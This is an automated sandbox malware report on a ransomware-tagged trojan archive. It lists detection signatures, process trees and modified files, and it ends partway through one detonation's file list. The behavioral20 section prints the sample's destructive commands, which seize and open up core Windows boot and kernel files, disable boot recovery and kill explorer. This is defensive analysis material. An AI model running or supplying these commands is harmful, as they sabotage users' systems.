Malware Analysis Report

2024-09-11 03:45

Sample ID 240619-pd81cavbqj
Target Personalization-trojan-3.1.zip
SHA256 88dd80a8d210b7e0f0fa327424c32b95542d9792ea28382fa0d0a71c4d211efc
Tags
defense_evasion discovery evasion exploit ransomware persistence privilege_escalation trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK Matrix
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral9 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral15 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral20 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral21 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral19 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral7 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral8 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral10 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral12 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral18 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral5 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral6 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral13 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral16 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral11 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral14 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral17 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

88dd80a8d210b7e0f0fa327424c32b95542d9792ea28382fa0d0a71c4d211efc

Threat Level: Known bad

The file Personalization-trojan-3.1.zip was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion exploit ransomware persistence privilege_escalation trojan

UAC bypass

Modifies boot configuration data using bcdedit

Possible privilege escalation attempt

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Modifies file permissions

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Sets desktop wallpaper using registry

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

Modifies data under HKEY_USERS

Modifies registry class

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Runs net.exe

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-19 12:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

133s

Max time network

136s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 200.79.70.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:17

Platform

win10-20240611-en

Max time kernel

129s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2376 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe C:\Windows\System32\cscript.exe
PID 2376 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe C:\Windows\System32\cscript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe"

C:\Windows\System32\cscript.exe

"C:\Windows\sysnative\cscript" C:\Users\Admin\AppData\Local\Temp\D30F.tmp\D310.tmp\D321.vbs //Nologo

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\D30F.tmp\D310.tmp\D321.vbs

MD5 82455ed5816ace2c6842dc84cb620b37
SHA1 cade773fe4a7bc311a08829f3b38e08ae7c1415a
SHA256 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e
SHA512 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

134s

Max time network

135s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.bat"

Signatures

Modifies boot configuration data using bcdedit

ransomware evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\ARKADI~1.AWA\Assets\awards_circle_gray.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\TOURNA~1\GameModeFreeCell.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~1\OneNoteAppList.targetsize-20_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Designs\Flags\large\nc_60x42.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MID6EE~1.SCA\AppxManifest.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~1\OneNoteSectionGroupLargeTile.scale-400.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI5B43~1.0_X\Assets\OneConnectAppList.targetsize-256.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\EMBOSS~1\plus.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE03D~1.0_X\Microsoft.Graphics.Canvas.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\ARKADI~1.STA\Assets\new_collection_available.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIFA2C~1.SCA\SkypeApp\Assets\edit_12x12.scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\EMBOSS~1\Chevron_icon.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0911~1.0_X\Assets\PhotosAppList.contrast-white_targetsize-256.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\5511_20x20x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE984~1.0_X\Assets\AppTiles\CONTRA~2\MapsLargeTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE745~1.0_X\Assets\AppPackageAppList.targetsize-36_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\Themes\Western\western_13s.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~1\OneNoteSplashLogo.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB044~1.SCA\Assets\TimerLargeTile.contrast-white_scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\HxCalendarAppImm.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~1\OutlookMailSmallTile.scale-150.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI97D5~1.SCA\Assets\SECOND~1\DIRECT~1\Work\LTR\CONTRA~2\LargeTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE984~1.0_X\Assets\SECOND~1\DIRECT~1\Home\RTL\LargeTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI476B~1.0_X\VFS\PROGRA~1\MICROS~1\OFFICE16\MUOPTIN.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE984~1.0_X\Assets\SECOND~1\Place\MedTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIA74D~1.SCA\Assets\CONTRA~1\SmallLogo.scale-150_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\OcsClientImm.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI79E2~1.0_X\Assets\GetStartedAppList.targetsize-96_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\HOWTOP~1\Klondike\Tips_6.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI115C~1.SCA\Assets\WorldClockWideTile.scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~2\HxMailWideTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI22BC~1.0_X\Assets\VoiceRecorderAppList.contrast-white_targetsize-24_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\MANIFE~1\CONTRA~2\Icon.targetsize-32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE984~1.0_X\Assets\SECOND~1\TRAFFI~1\CONTRA~2\SmallTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7B67~1.0_X\Assets\GamesXboxHubAppList.targetsize-32_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\THEMEP~1\Effects\Dust.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\HOWTOP~1\Klondike\Goal_2.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\background_gradient_2.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\SHARPD~1\RENDER~1\Shaders\Builtin\Bin\Textured_PS.fxo C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI698D~1.0_X\Assets\CONTRA~2\PeopleSplashScreen.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7B67~1.0_X\resources.pri C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7C12~1.0_X\Assets\AppList.targetsize-20_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE03D~1.0_X\TEE\en-US.Calendar.model C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~4.0_X\Assets\AppTiles\CONTRA~1\Weather_TileSmallSquare.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI169C~1.SCA\Assets\CalculatorLargeTile.contrast-white_scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI97D5~1.SCA\Assets\SECOND~1\DIRECT~1\Home\RTL\LargeTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\Catalog\shape_hexagon.3mf C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI698D~1.0_X\PeopleShared.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0911~1.0_X\AppxSignature.p7x C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI115C~1.SCA\Assets\AlarmsMedTile.contrast-black_scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~1\HxMailSplashLogo.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7C12~1.0_X\Assets\CONTRA~1\iheart-radio.scale-100_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Assets\SkypeTile.scale-200_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~2\HxA-Yahoo-Light.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MID550~1.SCA\Assets\SECOND~1\DIRECT~1\Car\RTL\CONTRA~1\SmallTile.scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\GAMEPL~1\LOCALI~1\localized_EN-GB.respack C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\Themes\themes_frame.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\10909_36x36x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI9599~1.0_X\Assets\WINDOW~1\WindowsCameraLargeTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\GameEnd\endGame_blue_up.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\HxMailLargeTile.scale-150.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI214C~1.0_X\Assets\trace.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7B67~1.0_X\Assets\GamesXboxHubAppList.targetsize-40_altform-unplated_contrast-high.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7C12~1.0_X\Assets\AppList.scale-100.png C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\system32\mspaint.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 512 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 3624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 3624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 4016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 4016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 4264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 512 wrote to memory of 4264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 512 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 1976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 1976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 1312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 512 wrote to memory of 1312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 512 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 512 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 512 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mspaint.exe
PID 512 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mspaint.exe
PID 512 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 512 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 512 wrote to memory of 520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 512 wrote to memory of 520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.bat"

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ntoskrnl.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\hal.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\hal.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ci.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ci.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\winload.efi"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\winload.efi" /grant everyone:F

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\takeown.exe

takeown /f "C:\Program Files\WindowsApps"

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\WindowsApps" /grant everyone:F

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\cmd.exe

cmd.exe

C:\Windows\system32\mspaint.exe

mspaint.exe

C:\Windows\system32\notepad.exe

notepad.exe

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService

C:\Windows\system32\timeout.exe

timeout /t 30 /nobreak

Network

Country Destination Domain Proto
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

136s

Max time network

139s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.png

Network

Country Destination Domain Proto
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 227.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

78s

Max time network

79s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"

Signatures

Modifies boot configuration data using bcdedit

ransomware evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\MICROS~3.SCA\Assets\AppTiles\Weather_TileLargeSquare.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\7260_24x24x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI155A~1.SCA\Assets\CONTRA~1\PeopleAppStoreLogo.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI115C~1.SCA\Assets\AlarmsAppList.contrast-white_scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7C12~1.0_X\Assets\music_welcome_page2.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\HelpIcon_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI21E8~1.0_X\Assets\Images\Stickers\THUMBN~1\Sticker_Icon_4_Point_Star.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE745~1.0_X\Assets\CONTRA~1\AppPackageAppList.targetsize-36_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\Audio\Daily_challenge_Coins Hit progress bar.wav C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\HOWTOP~1\StarClub\Help_3_2.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI21E8~1.0_X\Assets\Images\Stickers\THUMBN~1\Sticker_Icon_Gravel.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\2653_24x24x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\6478_48x48x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\FolderOrganizationCalloutImage.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\HxMailLargeTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~3.0_X\MICROS~1.MET\Autogen\JSBYTE~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\THEMEP~1\Themes\classic.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI21E8~1.0_X\Assets\Images\Stickers\THUMBN~1\Sticker_Icon_SadMouth.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\OneNotePageWideTile.scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE745~1.0_X\Assets\AppPackageAppList.targetsize-30.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\OneNotePageSmallTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\OneNoteSectionLargeTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~1\ExchangeMediumTile.scale-400.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI97D5~1.SCA\Assets\Images\Ratings\Yelp3.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~3.0_X\MICROS~1.ADV\bootstrap.js C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~1\HxCalendarAppList.scale-150.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~2\HxMailLargeTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\Themes\Jumbo\jumbo_cardback.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\TEXTUR~1\droplets.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\Contrast\CONTRA~2\BuilderLogo.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI5B43~1.0_X\Assets\CONTRA~2\OneConnectAppList.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Designs\EMOTIC~1\large\cash.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0911~1.0_X\LUMIA~1.VIE\Assets\IconOpenInRefocus.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~2\OneNoteAppList.targetsize-64_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\MAINPA~1\pyramid_bp_920.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Assets\Images\IncomingCallBrandingImage.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Designs\EMOTIC~1\large\dancing.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0911~1.0_X\Assets\PhotosAppList.targetsize-64_altform-fullcolor.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0679~1.SCA\Assets\GamesXboxHubSmallTile.scale-100.png C:\Windows\system32\cmd.exe N/A
